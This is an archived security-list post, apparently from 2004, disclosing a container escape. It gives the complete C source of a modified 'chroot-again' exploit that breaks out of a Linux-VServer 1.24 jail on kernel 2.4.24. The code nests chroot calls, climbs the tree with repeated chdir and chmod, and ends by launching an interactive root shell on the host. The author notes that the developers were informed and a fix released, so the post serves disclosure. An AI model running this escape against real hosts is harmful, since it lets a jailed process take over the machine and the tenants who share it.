TUCoPS :: Linux :: General :: hack1839.htm

Linux 2.4.24 with vserver 1.24 exploit
Linux 2.4.24 with vserver 1.24 exploit 

Hi securityfocus,

a small exploit from me which brakes out of a vserver, also if secured 
with "chmod 000 /vservers". It is a modification of the known 
"chroot-again" exploit. It belongs to chroots but also to the vserver 
project. Tested with linux 2.4.24 and vserver 1.24. The bug was posted 
to the developers, and in the today released version 1.25 it seems to be 
fixed.

/* vserver@deadbeef.de modified the chroot-again exploit */ 
/* to work on vservers with "chmod 000 /vservers" */

/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */

#include 
#include 

main()
{
 int i;

 if (chdir("/") != 0) {
   perror("cd /"); exit(1);
 }
 if (mkdir("baz", 0777) != 0) {
   perror("mkdir baz");
 }
 if (chroot("baz") != 0) {
   perror("chroot baz"); exit(1);
 }
 
 for (i=0; i<50; i++) {
    if (chdir("..") != 0) {
       perror("cd .."); /* exit(1); */
    }
    if (chmod("..", S_IXOTH) != 0) {
       perror("chmod"); /* exit(1); */
    }
 }
 if (chroot(".") != 0) {
   perror("chroot ."); exit(1);
 }
 printf("Exploit seems to work. =)\n");
 execl("/bin/sh", "sh", "-i", (char *)0);
 perror("exec sh");
 exit(0);
}

The developers have been noticed.

Greetings,
Markus Müller
GeNUA mbH

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH